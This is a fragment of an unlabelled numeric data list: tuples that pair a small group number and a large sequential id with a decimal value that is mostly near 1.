(240, 275223, 1.12),
(240, 275224, 1.16669),
(240, 275225, 1.33),
(240, 275226, 1.07331),
(240, 275227, 1.28331),
(240, 275228, 1.02662),
(240, 275229, 1.19),
(240, 275230, 1.23669),
(240, 275231, 1.09669),
(240, 275232, 1.21331),
(240, 275233, 0.56),
(240, 275234, 1.16669),
(240, 275235, 1.23669),
(240, 275236, 2.00662),
(240, 275237, 1.21331),
(240, 275238, 1.07331),
(240, 275239, 0.93331),
(240, 275240, 1.16669),
(240, 275241, 0.98),
(240, 275242, 0.98),
(240, 275243, 1.00331),
(240, 275244, 1.63338),
(240, 275245, 0.95669),
(240, 275246, 1.00331),
(240, 275247, 0.93331),
(240, 275248, 0.95669),
(240, 275249, 0.91),
(240, 275250, 0.98),
(240, 275251, 1.02669),
(240, 275252, 1.09669),
(240, 275253, 0.88669),
(240, 275254, 1.00331),
(240, 275255, 0.93331),
(240, 275256, 0.98),
(240, 275257, 1.07331),
(240, 275258, 1.02669),
(240, 275259, 0.91),
(240, 275260, 0.95669),
(240, 275261, 0.91),
(240, 275262, 0.88669),
(240, 275263, 0.91),
(240, 275264, 1.00331),
(240, 275265, 1.09669),
(240, 275266, 1.33),
(240, 275267, 1.02669),
(240, 275268, 1.26),
(240, 275269, 0.98),
(240, 275270, 2.4666),
(240, 275271, 3),
(240, 275276, 2.6666),
(240, 275277, 0.93331),
(240, 275278, 1.05),
(240, 275279, 0.84),
(240, 275280, 0.95669),
(240, 275281, 0.88669),
(240, 275282, 0.98),
(240, 275283, 0.91),
(240, 275284, 0.95669),
(240, 275285, 0.91),
(240, 275286, 0.95669),
(240, 275287, 1.07331),
(240, 275288, 1.16669),
(240, 275289, 0.93331),
(240, 275290, 1.00331),
(240, 275530, 2.04),
(306, 275530, 6.84),
(240, 275531, 0.93331),
(240, 275532, 1.05),
(240, 275533, 1.02669),
(240, 275534, 1.21331),
(240, 275535, 0.91),
(240, 275536, 0.98),
(240, 275537, 0.23331),
(240, 275538, 0.95669),
(240, 275539, 1.19),
(240, 275540, 0.95669),
(240, 275541, 1.09669),
(240, 275542, 1.07331),
(240, 275543, 0.32669),
(306, 275543, 0.32669),
(240, 275544, 0.93331),
(240, 275545, 1.05),
(240, 275546, 1.00331),
(240, 275547, 1.28331),
(240, 275548, 0.93331),
(240, 275549, 0.93331),
(240, 275550, 1.02669),
(240, 275551, 0.86331),
(240, 275552, 1.00331),
(240, 275553, 0.95669),
(240, 275554, 1.02669),
(240, 275555, 0.91),
(240, 275556, 1.05),
(240, 275557, 0.95669),
(240, 275558, 1.05),
(240, 275559, 0.95669),
(240, 275560, 1.12),
(240, 275561, 0.93331),
(240, 275562, 1.07331),
(240, 275563, 1.09669),
(240, 275564, 1.21331),
(240, 275565, 0.95669),
(240, 275566, 1.07331),
(240, 275567, 0.95669),
(240, 275568, 1.12),
(240, 275569, 0.93331),
(240, 275570, 0.91),
(240, 275571, 1.00331),
(240, 275572, 1.07331),
(240, 275573, 1.05),
(240, 275574, 1.14331),
(240, 275575, 1.07331),
(240, 275576, 0.95669),
(240, 275577, 1.05),
(240, 275578, 1.07331),
(240, 275579, 1.16669),
(240, 275580, 0.95669),
(240, 275581, 1.09669),
(240, 275582, 0.46669),
(240, 275583, 1.07331),
(240, 275584, 1.28331),
(240, 275585, 0.74662),
(240, 275586, 2.14662),
(240, 275587, 1.12),
(240, 275588, 1.21331),
(240, 275589, 1.12),
(240, 275590, 1.19),
(240, 275591, 0.98),
(240, 275592, 1.05),
(240, 275593, 0.65331),
(240, 275594, 1.12),
(240, 275595, 1.28331),
(240, 275596, 1.05),
(240, 275597, 1.14331),
(240, 275598, 1.05),
(240, 275599, 1.19),
(240, 275600, 0.98),
(240, 275601, 1.09669),
(240, 275602, 1.02669),
(240, 275603, 1.02669),
(240, 275604, 1.19),
(240, 275605, 1.00331),
(240, 275606, 1.12),
(241, 276693, 0.95669),
(241, 276694, 1.09669),
(241, 276695, 0.95669),
(241, 276696, 1.05),
(241, 276697, 1.00331),
(241, 276698, 0.98),
(241, 276699, 1.07331),
(241, 276700, 1.07331),
(241, 276701, 0.91),
(241, 276702, 1.00331),
(241, 276703, 0.86331),
(241, 276704, 0.95669),
(241, 276705, 0.91),
(241, 276706, 1.00331),
(241, 276707, 1.14331),
(241, 276708, 0.98),
(241, 276709, 1.07331),
(241, 276710, 0.51331),
(241, 276711, 1.07331),
(241, 276712, 1.16669),
(241, 276713, 1.05),
(241, 276714, 1.26),
(241, 276715, 0.98),
(241, 276716, 1.12),
(241, 276717, 0.91),
(241, 276718, 1.00331),
(241, 276719, 0.37331),
(241, 276720, 0.98),
(241, 276721, 1.05),
(241, 276722, 1.02669),
(241, 276723, 1.19),
(241, 276724, 1.09669),
(241, 276725, 1.19),
(241, 276726, 1.19),
(241, 276727, 1.02669),
(241, 276728, 0.88669),
(241, 276729, 0.95669),
(241, 276730, 1.21331),
(241, 276731, 1.26),
(241, 276732, 0.93331),
(241, 276733, 0.98),
(305, 276733, 1.96),
(306, 276733, 2.94),
(241, 276734, 1.14331),
(241, 276735, 0.86331),
(241, 276736, 1.05),
(241, 276737, 1.86662),
(241, 276738, 2.05338),
(241, 276739, 0.93331),
(305, 276739, 1.86662),
(241, 276740, 1.00331),
(241, 276741, 0.37331),
(241, 276742, 0.95669),
(241, 276743, 1.14331),
(241, 276744, 0.86331),
(241, 276745, 1.02669),
(241, 276746, 1.12),
(241, 276769, 0.91),
(241, 276770, 1.00331),
(241, 276771, 0.91),
(241, 276772, 1.02669),
(241, 276773, 0.98),
(241, 276774, 0.93331),
(241, 276775, 1.07331),
(241, 276776, 0.91),
(241, 276777, 1.00331),
(241, 276778, 0.98),
(241, 276779, 1.07331),
(241, 276780, 1.02669),
(241, 276781, 1.09669),
(241, 276782, 1.07331),
(241, 276783, 1.16669),
(241, 276784, 1.02669),
(241, 276785, 1.09669),
(241, 276786, 0.95669),
(241, 276787, 1.02669),
(241, 276788, 0.91),
(241, 276789, 1.02669),
(241, 276790, 0.86331),
(241, 276791, 0.98),
(241, 276792, 0.88669),
(241, 276793, 0.98),
(241, 276794, 1.05),
(241, 276795, 0.95669),
(241, 276796, 1.14331),
(241, 276797, 0.93331),
(241, 276798, 1.00331),
(241, 276799, 0.93331),
(241, 276800, 1.09669),
(241, 276801, 1.09669),
(241, 276802, 1.07331),
(241, 276803, 1.00331),
(241, 276804, 1.07331),
(241, 276805, 0.93331),
(241, 276806, 1.07331),
(241, 276807, 0.91),
(241, 276808, 0.98),
(241, 276809, 0.93331),
(241, 276810, 1.05),
(241, 276811, 0.86331),
(241, 276812, 0.98),
(241, 276813, 1.05),
(241, 276814, 1.12),
(241, 276815, 0.88669),
(241, 276816, 1.00331),
(241, 276817, 0.88669),
(241, 276818, 1.02669),
(241, 276819, 1.02669),
(241, 276820, 1.16669),
(241, 276821, 0.88669),
(241, 276822, 0.98),
(241, 276823, 0.98),
(241, 276824, 0.93331),
(241, 276825, 1.00331),
(241, 276826, 0.88669),
(241, 276827, 1.00331),
(241, 276878, 0.93331),
(306, 276878, 0.93331),
(241, 276879, 0.95669),
(290, 276879, 0.95669),
(290, 276880, 0.95669),
(241, 276880, 1.91338),
(241, 276881, 1.02669),
(241, 276882, 1.02669),
(241, 276883, 0.86331),
(241, 276884, 1.12),
(241, 276885, 0.91),
(241, 276886, 1.00331),
(241, 276887, 0.95669),
(241, 276888, 1.02669),
(241, 276889, 0.95669),
(241, 276890, 1.05),
(241, 276891, 1.00331),
(241, 276892, 0.42),
(241, 276893, 0.95669),
(241, 276894, 1.00331),
(241, 276895, 0.91),
(241, 276896, 1.00331),
(241, 276897, 1.00331),
(241, 276898, 1.05),
(241, 276899, 1.09669),
(241, 276900, 0.93331),
(241, 276901, 1.02669),
(241, 276902, 0.95669),
(241, 276903, 1.05),
(241, 276904, 1.02669),
(241, 276905, 1.16669),
(241, 276906, 0.91),
(241, 276907, 0.98),
(241, 276908, 1.09669),
(241, 276909, 0.91),
(241, 276910, 1.00331),
(241, 276911, 0.91),
(241, 276912, 1.02669),
(241, 276913, 1.02669),
(241, 276914, 0.93331),
(241, 276915, 1.00331),
(241, 276916, 1.05),
(241, 276917, 0.98),
(241, 276918, 0.95669),
(288, 276918, 0.95669),
(241, 276919, 1.00331),
(241, 276920, 0.91),
(241, 276921, 0.98),
(241, 276922, 1.02669),
(241, 276923, 1.14331),
(241, 276924, 1.05),
(241, 276925, 1.12),
(241, 276926, 0.93331),
(241, 276927, 0.95669),
(241, 276928, 0.88669),
(241, 276929, 0.95669),
(241, 276930, 0.88669),
(241, 276931, 0.84),
(241, 276932, 0.95669),
(241, 276933, 0.91),
(241, 276934, 0.98),
(241, 276935, 0.98),
(241, 276936, 2.4666),
(241, 276937, 2.8),
(241, 276941, 2.6666),
(241, 276942, 1.05),
(241, 276943, 1.16669),
(241, 276944, 0.88669),
(241, 276945, 0.98),
(241, 276946, 0.93331),
(241, 276947, 1.02669),
(241, 276948, 1.14331),
(241, 276949, 1.00331),
(241, 276950, 1.00331),
(241, 276951, 1.12),
(241, 277048, 1.12),
(241, 277049, 2.05338),
(241, 277050, 2.24),
(241, 277051, 0.88669),
(305, 277051, 0.88669),
(241, 277052, 1.00331),
(241, 277053, 0.46669),
(241, 277054, 1.05),
(241, 277055, 1.14331),
(241, 277056, 0.42),
(241, 277057, 1.02669),
(241, 277058, 1.12),
(241, 277059, 0.95669),
(241, 277060, 1.05),
(241, 277061, 1.05),
(241, 277062, 1.26),
(241, 277063, 0.46669),
(241, 277064, 1.00331),
(241, 277065, 1.07331),
(241, 277066, 1.00331),
(241, 277067, 1.05),
(241, 277068, 0.98),
(241, 277069, 1.09669),
(241, 277070, 1.02669),
(241, 277071, 1.12),
(242, 277610, 0.86331),
(242, 277611, 0.93331),
(242, 277612, 0.84),
(242, 277613, 1.00331),
(242, 277614, 1.00331),
(242, 277615, 1.05),
(242, 277616, 0.88669),
(242, 277617, 0.98),
(242, 278040, 3.71007),
(242, 278041, 0.95669),
(242, 278042, 1.16669),
(242, 278043, 0.37331),
(242, 278044, 1.09669),
(242, 278045, 1.19),
(242, 278046, 1.12),
(242, 278047, 0.93331),
(242, 278048, 1.02669),
(242, 278049, 1.19),
(242, 278050, 0.86331),
(242, 278051, 1.00331),
(242, 278052, 0.88669),
(242, 278053, 1.00331),
(242, 278054, 0.93331),
(242, 278055, 1.05),
(242, 278056, 0.95669),
(288, 278056, 0.95669),
(242, 278057, 1.05),
(242, 278058, 0.98),
(242, 278059, 1.05),
(242, 278060, 1.02669),
(242, 278061, 0.93331),
(242, 278062, 1.05),
(242, 278063, 0.91),
(242, 278064, 1.02669),
(242, 278065, 0.95669),
(242, 278066, 1.02669),
(242, 278067, 0.93331),
(242, 278068, 1.09669),
(242, 278069, 0.86331),
(242, 278070, 0.95669),
(242, 278071, 1.14331),
(242, 278072, 1.21331),
(242, 278073, 1.26),
(242, 278074, 0.60669),
(242, 278075, 1.21331),
(242, 278076, 1.33),
(242, 278077, 1.00331),
(242, 278078, 1.12),
(242, 278079, 0.23331),
(242, 278080, 0.93331),
(242, 278081, 1.12),
(242, 278082, 1.00331),
(242, 278083, 1.00331),
(242, 278084, 1.07331),
(242, 278085, 1.02669),
(242, 278086, 1.09669),
(242, 278087, 1.02669),
(242, 278088, 1.23669),
(242, 278089, 1.02669),
(242, 278090, 1.14331),
(242, 278091, 1.02669),
(242, 278092, 1.07331),
(242, 278093, 1.19),
(242, 278094, 0.95669),
(242, 278095, 1.07331),
(242, 278096, 0.93331),
(242, 278097, 1.02669),
(242, 278098, 0.93331),
(242, 278099, 1.02669),
(242, 278100, 1.00331),
(242, 278101, 1.07331),
(242, 278102, 0.91),
(242, 278103, 0.95669),
(242, 278143, 1.00331),
(242, 278144, 0.86331),
(242, 278145, 0.93331),
(242, 278146, 0.32669),
(242, 278147, 0.95669),
(242, 278148, 1.05),
(242, 278149, 0.93331),
(242, 278150, 1.00331),
(242, 278151, 1.14331),
(242, 278152, 0.65331),
(242, 278153, 1.14331),
(242, 278154, 1.23669),
(242, 278155, 1.09669),
(242, 278156, 0.46662),
(242, 278157, 0.88669),
(242, 278158, 0.95669),
(242, 278159, 0.88669),
(242, 278160, 0.98),
(242, 278161, 0.88669),
(242, 278162, 0.98),
(242, 278163, 0.95669),
(242, 278164, 1.05),
(242, 278165, 1.00331),
(242, 278166, 0.37331),
(242, 278167, 0.95669),
(242, 278168, 1.07331),
(242, 278169, 1.05),
(242, 278170, 0.98),
(242, 278171, 0.91),
(242, 278172, 1.14331),
(242, 278173, 0.93331),
(242, 278174, 1.00331),
(242, 278175, 1.05),
(242, 278176, 0.98),
(242, 278177, 0.98),
(242, 278178, 0.91),
(242, 278179, 1.00331),
(242, 278180, 0.98),
(242, 278181, 1.09669),
(242, 278182, 0.51331),
(242, 278183, 1.05),
(242, 278184, 1.12),
(242, 278185, 0.18669),
(242, 278186, 0.95669),
(242, 278187, 1.05),
(242, 278188, 0.98),
(242, 278189, 1.05),
(242, 278190, 1.00331),
(242, 278191, 0.37331),
(242, 278192, 0.98),
(242, 278193, 1.14331),
(242, 278194, 1.02669),
(242, 278195, 1.02669),
(242, 278196, 1.09669),
(242, 278197, 1.00331),
(242, 278198, 1.09669),
(242, 278199, 1.12),
(242, 278200, 0.23331),
(304, 278200, 0.23331),
(242, 278201, 0.88669),
(304, 278201, 0.88669),
(242, 278202, 1.00331),
(242, 278203, 0.51331),
(242, 278204, 1.16669),
(242, 278205, 1.37669),
(242, 278206, 0.95669),
(242, 278207, 1.09669),
(242, 278378, 0.81669),
(242, 278379, 0.93331),
(242, 278380, 0.91),
(242, 278381, 1.02669),
(242, 278382, 0.23331),
(242, 278383, 1.05),
(242, 278384, 1.14331),
(242, 278385, 0.18669),
(242, 278386, 0.91),
(242, 278387, 1.00331),
(242, 278388, 0.86331),
(242, 278389, 0.95669),
(242, 278390, 0.84),
(242, 278391, 0.93331),
(242, 278392, 0.93331),
(242, 278393, 2.05338),
(242, 278394, 1.02669),
(242, 278395, 1.14331),
(242, 278396, 0.86331),
(242, 278397, 1.07331),
(242, 278398, 0.14),
(292, 278398, 0.14),
(242, 278399, 0.86331),
(242, 278400, 0.98),
(242, 278401, 0.32669),
(242, 278402, 0.95669),
(242, 278403, 1.19),
(242, 278404, 0.98),
(242, 278405, 1.07331),
(242, 278406, 1.02669),
(242, 278407, 1.14331),
(242, 278408, 0.32669),
(242, 278409, 0.95669),
(242, 278410, 1.19),
(242, 278411, 0.98),
(242, 278412, 1.02669),
(242, 278413, 0.93331),
(242, 278414, 0.88669),
(242, 278415, 0.95669),
(242, 278416, 1.07331),
(242, 278417, 0.98),
(242, 278418, 1.23669),
(242, 278419, 0.88669),
(304, 278419, 0.88669),
(242, 278420, 0.95669),
(304, 278420, 0.95669),
(242, 278421, 0.98),
(242, 278422, 0.98),
(242, 278423, 0.84),
(242, 278424, 1.00331),
(242, 278425, 0.86331),
(242, 278426, 0.98),
(242, 278427, 0.88669),
(242, 278428, 0.93331),
(242, 278429, 0.98),
(242, 278430, 0.81669),
(242, 278431, 0.91),
(242, 278432, 0.91),
(242, 278433, 1.07331),
(242, 278434, 0.88669),
(242, 278435, 0.93331),
(242, 278436, 0.98),
(242, 278437, 2.00662),
(242, 278438, 1.05),
(242, 278439, 0.86331),
(242, 278440, 1.05),
(242, 278441, 0.98),
(242, 278442, 1.07331),
(242, 278443, 1.09669),
(242, 278444, 0.98),
(242, 278445, 1.12),
(242, 278446, 0.18669),
(242, 278447, 0.86331),
(242, 278448, 0.98),
(242, 278449, 0.51331),
(242, 278450, 1.00331),
(242, 278451, 1.12),
(242, 278452, 1.21331),
(242, 278453, 1.16669),
(242, 278454, 1.02669),
(242, 278455, 1.21331),
(242, 278456, 0.93331),
(242, 278457, 1.12),
(242, 278458, 0.93331),
(242, 278459, 1.00331),
(242, 278460, 0.95669),
(242, 278461, 1.02669),
(242, 278462, 0.95669),
(242, 278463, 0.91),
(242, 278464, 0.86331),
(242, 278465, 0.95669),
(242, 278466, 0.93331),
(242, 278467, 1.05),
(242, 278468, 0.98),
(242, 278469, 0.98),
(242, 278470, 0.98),
(242, 278471, 1.05),
(242, 278472, 0.98),
(242, 278473, 0.95669),
(242, 278474, 0.93331),
(242, 278475, 0.95669),
(242, 278476, 0.23331),
(242, 278477, 0.93331),
(242, 278478, 1.12),
(242, 278479, 0.88669),
(242, 278480, 0.98),
(242, 278481, 0.81669),
(242, 278482, 0.91),
(242, 278483, 0.86331),
(242, 278484, 0.93331),
(242, 278485, 0.91),
(242, 278486, 1.05),
(242, 278487, 0.86331),
(242, 278488, 0.95669),
(242, 278489, 0.86331),
(242, 278490, 1.00331),
(242, 278491, 0.95669),
(242, 278492, 1.14331),
(242, 278493, 2.4666),
(242, 278494, 3),
(242, 278508, 2.6666),
(242, 278509, 1.02669),
(242, 278510, 1.12),
(242, 278511, 1.02669),
(242, 278512, 1.05),
(242, 278513, 0.86331),
(242, 278514, 0.98),
(242, 278515, 0.91),
(306, 278515, 0.91),
(242, 278516, 1.02669),
(242, 278517, 0.88669),
(242, 278518, 0.95669),
(242, 278519, 1.07331),
(242, 278847, 2.04),
(242, 278848, 0.86331),
(242, 278849, 1.00331),
(242, 278850, 0.23331),
(242, 278851, 0.91),
(242, 278852, 1.07331),
(242, 278853, 1.07331),
(242, 278854, 1.02669),
(242, 278855, 0.95669),
(242, 278856, 1.21331),
(242, 278857, 0.93331),
(242, 278858, 0.98),
(242, 278859, 1.07331),
(242, 278860, 1.00331),
(242, 278861, 1.19),
(242, 278862, 1.14331),
(242, 278863, 1.26),
(242, 278864, 1.28331),
(242, 278865, 1.00331),
(242, 278866, 1.12),
(242, 278867, 1.09669),
(242, 278868, 1.23669),
(242, 278869, 0.51331),
(242, 278870, 1.00331),
(242, 278871, 1.09669),
(242, 278872, 1.14331),
(242, 278873, 0.93331),
(242, 278874, 1.02669),
(242, 278875, 1.09669),
(242, 278876, 0.88669),
(242, 278877, 1.02669),
(242, 278878, 1.00331),
(242, 278879, 1.14331),
(242, 278880, 0.23331),
(242, 278881, 0.88669),
(242, 278882, 0.98),
(242, 278883, 0.46669),
(290, 278883, 0.46669),
(242, 278884, 1.19),
(242, 278885, 1.28331),
(242, 278886, 0.95669),
(242, 278887, 1.09669),
(242, 278888, 0.88669),
(242, 278889, 0.95669),
(242, 278890, 0.88669),
(242, 278891, 1.00331),
(242, 278892, 1.02669),
(242, 278893, 1.21331),
(242, 278894, 1.09669),
(242, 278895, 1.16669),
(242, 278896, 1.02669),
(242, 278897, 1.12),
(242, 278898, 0.91),
(242, 278899, 0.46669),
(242, 278900, 1.00331),
(242, 278901, 1.09669),
(242, 278902, 0.28),
(242, 278903, 1.02669),
(242, 278904, 1.14331),
(242, 278905, 1.00331),
(242, 278906, 1.09669),
(242, 278907, 1.00331),
(242, 278908, 1.07331),
(242, 278909, 0.51331),
(242, 278910, 1.05),
(242, 278911, 1.26),
(242, 278912, 0.98),
(242, 278913, 1.05),
(242, 278914, 0.74662),
(242, 278915, 1.05),
(242, 278916, 1.16669),
(242, 278917, 1.02669),
(242, 278918, 1.21331),
(242, 278919, 0.46669),
(242, 278920, 1.00331),
(242, 278921, 1.16669),
(242, 278922, 0.46669),
(242, 278923, 1.02669),
(242, 278924, 1.21331),
(242, 278925, 0.23331),
(242, 278926, 0.93331),
(242, 278927, 1.02669),
(242, 278928, 1.00331),
(242, 278929, 0.86331),
(242, 278930, 0.95669),
(242, 278931, 0.93331),
(242, 278932, 1.05),
(243, 281724, 0.28),
(243, 281725, 0.91),
(243, 281726, 0.98),
(243, 281727, 0.28),
(243, 281728, 0.91),
(243, 281729, 0.98),
(243, 281912, 1.09669),
(243, 281913, 0.91),
(243, 281914, 1.00331),
(243, 281915, 0.91),
(243, 281916, 1.02669),
(243, 281917, 0.28),
(243, 281918, 0.93331),
(243, 281919, 1.05),
(243, 281920, 0.98),
(243, 281921, 1.07331),
(243, 281922, 1.02662),
(243, 281923, 2.05338),
(243, 281924, 1.30669),
(243, 281925, 1.14331),
(243, 281926, 1.07331),
(243, 281927, 1.09669),
(243, 281928, 1.16669),
(243, 281929, 0.18669),
(243, 281930, 0.91),
(243, 281931, 1.00331),
(243, 281932, 1.23669),
(243, 281933, 1.91338),
(243, 281934, 0.95669),
(243, 281935, 0.93345),
(243, 281936, 0.86331),
(243, 281937, 1.00331),
(243, 281938, 0.86331),
(243, 281939, 1.09669),
(243, 281940, 1.00331),
(243, 281941, 1.07331),
(243, 281942, 0.86331),
(243, 281943, 0.98),
(243, 281944, 0.95669),
(243, 281945, 1.02669),
(243, 281946, 0.23331),
(288, 281946, 0.23331),
(243, 281947, 0.88669),
(243, 281948, 1.16669),
(243, 281964, 0.32669),
(243, 281965, 0.93331),
(243, 281966, 1.12),
(243, 281967, 1.09669),
(243, 281968, 1.02669),
(243, 281969, 1.14331),
(243, 281970, 1.00331),
(243, 281971, 1.12),
(243, 281972, 0.88669),
(243, 281973, 1.00331),
(243, 281974, 0.93331),
(243, 281975, 1.07331),
(243, 281976, 1.00331),
(243, 281977, 1.16669),
(243, 281978, 1.00331),
(243, 281979, 1.09669),
(243, 281980, 1.02669),
(243, 281981, 1.05),
(243, 281982, 1.00331),
(243, 281983, 1.00331),
(243, 281984, 1.12),
(243, 281985, 0.23331),
(243, 281986, 0.93331),
(243, 281987, 1.05),
(243, 281988, 1.07331),
(243, 281989, 1.21331),
(243, 281990, 1.05),
(243, 281991, 1.19),
(243, 281992, 1.07331),
(243, 281993, 1.07331),
(243, 281994, 1.19),
(243, 282087, 0.95669),
(243, 282088, 0.93331),
(292, 282088, 0.93331),
(243, 282089, 0.98),
(243, 282090, 0.91),
(243, 282091, 1.00331),
(243, 282092, 1.02669),
(243, 282093, 0.95669),
(243, 282094, 1.02669),
(243, 282095, 0.84),
(243, 282096, 0.91),
(243, 282097, 0.95669),
(243, 282098, 1.19),
(243, 282099, 0.98),
(243, 282100, 2.1),
(243, 282101, 1.14331),
(243, 282102, 1.14331),
(243, 282103, 1.09669),
(243, 282104, 0.95669),
(243, 282105, 1.02669),
(243, 282106, 0.98),
(243, 282107, 1.05),
(243, 282108, 0.93331),
(243, 282109, 1.02669),
(243, 282110, 1.00331),
(243, 282111, 0.98),
(243, 282112, 0.91),
(243, 282113, 1.09669),
(243, 282114, 0.98),
(243, 282115, 0.37331),
(243, 282116, 1.05),
(243, 282117, 1.12),
(243, 282118, 0.60669),
(243, 282119, 1.23669),
(243, 282120, 1.30669),
(243, 282121, 1.07331),
(243, 282122, 1.21331),
(243, 282123, 1.07331),
(243, 282124, 0.86331),
(243, 282125, 0.93331),
(243, 282126, 0.98),
(243, 282127, 1.02669),
(243, 282128, 1.02669),
(243, 282129, 0.93331),
(243, 282130, 1.02669),
(243, 282131, 1.02669),
(243, 282132, 0.81669),
(243, 282133, 0.93331),
(243, 282134, 0.86331),
(243, 282135, 0.91),
(243, 282136, 1.07331),
(243, 282137, 0.95669),
(243, 282138, 1.00331),
(243, 282139, 0.93331),
(243, 282140, 1.05),
(243, 282141, 1.30669),
(243, 282142, 0.95669),
(243, 282143, 1.05),
(243, 282144, 1.00331),
(243, 282145, 0.91),
(243, 282146, 0.95669),
(243, 282147, 0.86331),
(243, 282148, 1.07331),
(243, 282149, 0.86331),
(243, 282150, 1.07331),
(243, 282151, 2.4666),
(243, 282152, 2.7334),
(243, 282168, 2.6666),
(243, 282169, 0.88669),
(243, 282170, 1.00331),
(243, 282171, 1.05),
(243, 282172, 1.14331),
(243, 282173, 0.91),
(243, 282174, 1.14331),
(243, 282175, 1.05),
(243, 282176, 1.14331),
(243, 282177, 0.37331),
(243, 282178, 0.95669),
(243, 282179, 1.05),
(243, 282180, 0.86331),
(243, 282181, 0.95669),
(243, 282182, 0.93331),
(243, 282183, 1.05),
(243, 282356, 1.00331),
(243, 282357, 0.51331),
(243, 282358, 1.05),
(243, 282359, 1.16669),
(243, 282360, 1.12),
(243, 282361, 1.07331),
(243, 282362, 1.26),
(243, 282363, 1.07331),
(243, 282364, 1.33),
(243, 282365, 0.28),
(243, 282366, 0.91),
(243, 282367, 1.00331),
(243, 282368, 0.32669),
(243, 282369, 0.93331),
(243, 282370, 1.02669),
(243, 282371, 1.07331),
(243, 282372, 1.00331),
(243, 282373, 1.14331),
(243, 282374, 8.16981),
(243, 282375, 8.55),
(243, 282376, 1.02669),
(243, 282377, 1.12),
(243, 282378, 0.28),
(243, 282379, 0.93331),
(243, 282380, 1.09669),
(243, 282381, 0.37331),
(243, 282382, 0.95669),
(243, 282383, 1.02669),
(243, 282384, 0.88669),
(243, 282385, 1.00331),
(243, 282386, 1.05),
(243, 282387, 0.95669),
(243, 282388, 1.07331),
(243, 282389, 1.00331),
(243, 282390, 1.12),
(244, 283860, 0.98),
(244, 283861, 1.07331),
(244, 283862, 0.86331),
(244, 283863, 0.93331),
(244, 283864, 0.88669),
(244, 283865, 0.98),
(244, 283866, 0.28),
(244, 283867, 0.93331),
(244, 283868, 1.19),
(244, 283869, 0.42),
(244, 283870, 1.02669),
(244, 283871, 1.16669),
(244, 283872, 0.88669),
(244, 283873, 1.00331),
(244, 283874, 0.91),
(244, 283875, 0.95669),
(244, 283876, 1.00331),
(244, 283877, 1.09669),
(244, 283878, 0.95669),
(244, 283879, 1.05),
(244, 283893, 0.91),
(244, 283894, 1.09669),
(244, 283895, 1.02669),
(244, 283896, 1.14331),
(244, 283897, 0.91),
(244, 283898, 1.07331),
(244, 283899, 0.98),
(244, 283900, 1.05),
(244, 283901, 1.00331),
(244, 283902, 1.12),
(244, 283903, 1.16669),
(244, 283904, 1.02669),
(244, 283905, 1.09669),
(244, 283906, 1.09669),
(244, 283907, 1.00331),
(244, 283908, 0.91),
(244, 283909, 1.05),
(244, 283910, 1.02669),
(244, 283911, 1.19),
(244, 283912, 0.37331),
(244, 283913, 0.95669),
(244, 283914, 1.09669),
(244, 283915, 0.51331),
(244, 283916, 1.07331),
(244, 283917, 1.16669),
(244, 283918, 0.93331),
(244, 283919, 1.02669),
(244, 283920, 1.02669),
(244, 283921, 1.14331),
(244, 283922, 0.88669),
(244, 283923, 1.14331),
(244, 283924, 0.95669),
(244, 283925, 1.05),
(244, 283926, 0.98),
(244, 283927, 1.14331),
(244, 284043, 0.81669),
(244, 284044, 0.93331),
(244, 284045, 0.91),
(244, 284046, 0.98),
(244, 284047, 1.05),
(244, 284048, 0.98),
(244, 284049, 1.07331),
(244, 284050, 1.00331),
(244, 284051, 1.07331),
(244, 284052, 0.95669),
(244, 284053, 1.05),
(244, 284054, 0.98),
(244, 284055, 1.05),
(244, 284056, 3.43992),
(244, 284057, 0.95669),
(244, 284058, 0.93331),
(244, 284059, 1.05),
(244, 284060, 0.46669),
(244, 284061, 1.23669),
(244, 284062, 1.37669),
(244, 284063, 1.02669),
(244, 284064, 1.12),
(244, 284065, 1.19),
(244, 284066, 1.09669),
(244, 284067, 1.00331),
(244, 284068, 1.02669),
(244, 284069, 0.93331),
(244, 284070, 1.00331),
(244, 284071, 0.91),
(244, 284072, 1.00331),
(244, 284073, 2.4666),
(244, 284074, 3.1334),
(244, 284086, 2.6666),
(244, 284087, 0.37331),
(244, 284088, 0.95669),
(244, 284089, 1.05),
(244, 284090, 0.95669),
(244, 284091, 1.07331),
(244, 284092, 0.98),
(244, 284191, 0.91),
(244, 284192, 1.05),
(244, 284193, 0.93331),
(244, 284194, 1.05),
(244, 284195, 0.91),
(244, 284196, 1.00331),
(244, 284197, 0.98),
(244, 284198, 0.93331),
(244, 284199, 1.05),
(244, 284200, 3.12),
(244, 284201, 3.43992),
(244, 284202, 0.98),
(244, 284203, 0.37331),
(244, 284204, 1.00331),
(244, 284205, 1.09669),
(244, 284206, 0.98),
(244, 284207, 1.26),
(244, 284208, 0.98),
(244, 284209, 1.05),
(244, 284210, 2.00662),
(244, 284211, 1.07331),
(244, 284212, 1.09669),
(244, 284213, 1.05),
(244, 284214, 1.00331),
(244, 284215, 1.16669),
(244, 284216, 1.02669),
(244, 284217, 1.12),
(244, 284218, 1.00331),
(244, 284219, 1.16669),
(245, 284831, 0.28),
(245, 284832, 0.91),
(245, 284833, 1.00331),
(245, 284834, 0.23331),
(245, 284835, 0.93331),
(245, 284836, 1.02669),
(245, 284837, 0.28),
(245, 284838, 0.98),
(245, 284839, 1.28331),
(245, 284840, 0.93331),
(245, 284841, 1.09669),
(245, 284855, 1.00331),
(245, 284856, 1.09669),
(245, 284857, 0.32669),
(245, 284858, 0.98),
(245, 284859, 1.12),
(245, 284860, 0.91),
(245, 284861, 1.02669),
(245, 284862, 0.88669),
(245, 284863, 0.95669),
(245, 284864, 1.00331),
(245, 284865, 1.21331),
(245, 284866, 1.14331),
(245, 284867, 0.88669),
(306, 284867, 0.88669),
(245, 284868, 1.02669),
(245, 284869, 0.93331),
(245, 284870, 1.07331),
(245, 284887, 0.32669),
(245, 284888, 0.98),
(245, 284889, 1.14331),
(245, 284890, 0.65338),
(245, 284891, 0.98),
(245, 284892, 1.14331),
(245, 284893, 1.05),
(245, 284894, 1.12),
(245, 284895, 3.80019),
(245, 284896, 8.36019),
(245, 284897, 10.83),
(245, 284898, 1.07331),
(245, 284899, 0.88669),
(245, 284900, 0.95669),
(245, 284901, 0.42),
(245, 284902, 1.05),
(245, 284903, 1.26),
(245, 284904, 1.05),
(245, 284905, 1.12),
(245, 284906, 1.14331),
(245, 284907, 1.28331),
(245, 284908, 0.91),
(245, 284909, 1.07331),
(245, 284910, 1.16669),
(245, 284911, 1.30669),
(245, 284912, 0.98),
(245, 284913, 0.81669),
(245, 284914, 0.98),
(245, 284915, 0.91),
(245, 284916, 1.14331),
(245, 284917, 0.91),
(245, 284918, 1.07331),
(245, 284919, 2.4666),
